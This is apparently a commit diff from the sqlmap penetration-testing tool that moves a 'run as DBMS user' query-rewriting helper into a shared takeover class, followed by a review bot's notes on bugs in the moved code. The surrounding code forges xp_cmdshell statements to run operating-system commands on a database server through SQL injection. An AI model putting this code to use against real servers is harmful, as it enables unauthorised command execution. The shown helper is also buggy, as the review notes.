make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too

Bernardo Damele 2012-07-02 02:14:03 +01:00
parent 6697927098
commit add8352804
2 changed files with 17 additions and 17 deletions


@ -16,6 +16,7 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.shell import autoCompletion from lib.core.shell import autoCompletion
from lib.request import inject from lib.request import inject
from lib.takeover.udf import UDF from lib.takeover.udf import UDF
@ -37,6 +38,21 @@ class Abstraction(Web, UDF, xp_cmdshell):
Web.__init__(self) Web.__init__(self)
xp_cmdshell.__init__(self) xp_cmdshell.__init__(self)
def runAsDBMSUser(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def execCmd(self, cmd, silent=False): def execCmd(self, cmd, silent=False):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd) self.webBackdoorRunCmd(cmd)
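Review bot: In the new `runAsDBMSUser`, `sqlType` is assigned only when a `SQL_STATEMENTS` prefix matches, so a query that matches none reaches `if sqlType and "SELECT" not in sqlType` with the name unbound and raises UnboundLocalError; set `sqlType = None` before the outer loop. The `break` appears to leave only the inner loop (indentation is lost in this rendering), so a later title can still overwrite the first match. The method is described as generic yet still passes `DBMS.MSSQL` to `getSPQLSnippet`, so a PostgreSQL caller would receive the MSSQL snippet until that argument follows the identified back-end. This hunk adds only the `SQL_STATEMENTS` import; confirm that `getSPQLSnippet` is already imported in this file, otherwise the call fails with NameError.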


@ -21,7 +21,6 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS from lib.core.enums import HASHDB_KEYS
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request import inject from lib.request import inject
@ -148,21 +147,6 @@ class xp_cmdshell:
if cmd: if cmd:
self.xpCmdshellExecCmd(cmd) self.xpCmdshellExecCmd(cmd)
def xpCmdshellForgeRunAs(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def xpCmdshellForgeCmd(self, cmd): def xpCmdshellForgeCmd(self, cmd):
self.__randStr = randomStr(lowercase=True) self.__randStr = randomStr(lowercase=True)
self.__cmd = "0x%s" % hexencode(cmd) self.__cmd = "0x%s" % hexencode(cmd)
@ -170,7 +154,7 @@ class xp_cmdshell:
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.xpCmdshellForgeRunAs(self.__forgedCmd) return self.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False): def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd) cmd = self.xpCmdshellForgeCmd(cmd)